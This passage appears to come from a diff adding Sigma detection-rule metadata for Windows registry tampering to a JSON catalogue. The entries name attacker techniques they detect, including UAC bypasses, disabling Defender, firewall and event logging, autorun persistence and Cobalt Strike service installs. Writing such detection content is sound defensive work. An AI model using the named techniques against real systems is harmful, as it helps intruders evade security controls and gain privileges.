"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_winsock2.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "value": "Wow6432Node CurrentVersion Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "18f2065c-d36c-464a-a748-bcf909acb2e3", + "value": "Wow6432Node Classes Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8", + "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "uuid": "83314318-052a-4c90-a1ad-660ece38d276", + "value": "Blackbyte Ransomware Registry", + "meta": { + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/01/24", + "filename": "registry_set_blackbyte_ransomware.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Bypasses User Account Control using a fileless method", + "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "value": "Bypass UAC Using DelegateExecute", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ], + "creation_date": "2022/01/05", + "filename": "registry_set_bypass_uac_using_delegateexecute.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", + "value": "Bypass UAC Using Event Viewer", + "meta": { + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ], + "creation_date": "2022/01/05", + "filename": "registry_set_bypass_uac_using_eventviewer.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "uuid": "724ea201-6514-4f38-9739-e5973c34f49a", + "value": "Bypass UAC Using SilentCleanup Task", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", + "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ], + "creation_date": "2022/01/06", + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e", + "value": "Changing RDP Port to Non Standard Number", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ], + "creation_date": "2022/01/01", + "filename": "registry_set_change_rdp_port.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Hides the file extension through modification of the registry", + "uuid": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", + "value": "IE Change Domain Zone", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", + "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ], + "creation_date": "2022/01/22", + "filename": "registry_set_change_security_zones.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "uuid": "4916a35e-bfc4-47d0-8e25-a003d7067061", + "value": "Disable Sysmon Event Logging Via Registry", + "meta": { + "refs": [ + "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", + "https://youtu.be/zSihR3lTf7g", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/07/28", + "filename": "registry_set_change_sysmon_driver_altitude.yml", + "author": "B.Talebi", + "level": "high", + "falsepositive": [ + "Legitimate driver altitude change to hide sysmon" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "value": "Change Winevt Event Access Permission Via Registry", + "meta": { + "refs": [ + "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", + "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", + "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2022/09/17", + "filename": "registry_set_change_winevt_channelaccess.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "value": "CHM Helper DLL Persistence", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/htmlhelpauthor.html", + "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chm_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_chm_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1133" + ], + "creation_date": "2021/12/28", + "filename": "registry_set_chrome_extension.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "value": "CobaltStrike Service Installations in Registry", + "meta": { + "refs": [ + "https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ], + "creation_date": "2021/06/29", + "filename": "registry_set_cobaltstrike_service_installs.yml", + "author": "Wojciech Lesicki", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "uuid": "07743f65-7ec9-404a-a519-913db7118a8d", + "value": "COM Hijack via Sdclt", + "meta": { + "refs": [ + "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", + "https://www.exploit-db.com/exploits/47696", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" + ], + "creation_date": "2020/09/27", + "filename": "registry_set_comhijack_sdclt.yml", + "author": "Omkar Gudhate", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", + "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "value": "CrashControl CrashDump Disabled", + "meta": { + "refs": [ + "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" + ], + "tags": [ + "attack.t1564", + "attack.t1112" + ], + "creation_date": "2022/02/24", + "filename": "registry_set_crashdump_disabled.yml", + "author": "Tobias Michalski", + "level": "medium", + "falsepositive": [ + "Legitimate disabling of crashdumps" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "uuid": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "value": "Service Binary in Suspicious Folder", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/05/02", + "filename": "registry_set_creation_service_susp_folder.yml", + "author": "Florian Roth, frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect the creation of a service with a service binary located in a uncommon directory", + "uuid": "277dc340-0540-42e7-8efb-5ff460045e07", + "value": "Service Binary in Uncommon Folder", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/05/02", + "filename": "registry_set_creation_service_uncommon_folder.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the abuse of custom file open handler, executing powershell", + "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", + "value": "Custom File Open Handler Executes PowerShell", + "meta": { + "refs": [ + "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2022/06/11", + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml", + "author": "CD_R0M_", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "uuid": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "value": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "meta": { + "refs": [ + "https://windows-internals.com/printdemon-cve-2020-1048/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/05/13", + "filename": "registry_set_cve_2020_1048_new_printer_port.yml", + "author": "EagleEye Team, Florian Roth, NVISO", + "level": "high", + "falsepositive": [ + "New printer port install on host" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00", + "value": "CVE-2021-31979 CVE-2021-33771 Exploits", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" + ], + "creation_date": "2021/07/16", + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml", + "author": "Sittikorn S, frack113", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "uuid": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "value": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", + "meta": { + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1221" + ], + "creation_date": "2020/05/31", + "filename": "registry_set_cve_2022_30190_msdt_follina.yml", + "author": "Sittikorn S", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence which will get invoked when an application crashes", + "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b", + "value": "Add Debugger Entry To DbgManagedDebugger For Persistence", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574" + ], + "creation_date": "2022/08/07", + "filename": "registry_set_dbgmanageddebugger_persistence.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the Setting of Windows Defender Exclusions", + "uuid": "a982fc9c-6333-4ffb-a51d-addb04e8b529", + "value": "Windows Defender Exclusions Added - Registry", + "meta": { + "refs": [ + "https://twitter.com/_nullbind/status/1204923340810543109", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/06", + "filename": "registry_set_defender_exclusions.yml", + "author": "Christian Burkard", + "level": "medium", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "uuid": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "value": "DHCP Callout DLL Installation", + "meta": { + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ], + "creation_date": "2017/05/15", + "filename": "registry_set_dhcp_calloutdll.yml", + "author": "Dimitrios Slamaris", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects disabling Windows Defender Exploit Guard Network Protection", + "uuid": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "value": "Disable Exploit Guard Network Protection on Windows Defender", + "meta": { + "refs": [ + "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/08/04", + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", + "uuid": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "value": "Disabled Windows Defender Eventlog", + "meta": { + "refs": [ + "https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/07/04", + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects disabling Windows Defender PUA protection", + "uuid": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "value": "Disable PUA Protection on Windows Defender", + "meta": { + "refs": [ + "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/08/04", + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml", + "author": "Austin Songer @austinsonger", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects disabling Windows Defender Tamper Protection", + "uuid": "93d298a1-d28f-47f1-a468-d971e7796679", + "value": "Disable Tamper Protection on Windows Defender", + "meta": { + "refs": [ + "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/08/04", + "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", + "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "value": "Disable Administrative Share Creation at Startup", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ], + "creation_date": "2022/01/16", + "filename": "registry_set_disable_administrative_share.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering of autologger trace sessions which is a technique used by attackers to disable logging", + "uuid": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "value": "AutoLogger Sessions Tamper", + "meta": { + "refs": [ + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/08/01", + "filename": "registry_set_disable_autologger_sessions.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f", + "value": "Disable Microsoft Defender Firewall via Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2022/01/09", + "filename": "registry_set_disable_defender_firewall.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", + "uuid": "e2482f8d-3443-4237-b906-cc145d87a076", + "value": "Disable Internal Tools or Feature in Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/03/18", + "filename": "registry_set_disable_function_user.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate admin script" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", + "uuid": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "value": "Disable Macro Runtime Scan Scope", + "meta": { + "refs": [ + 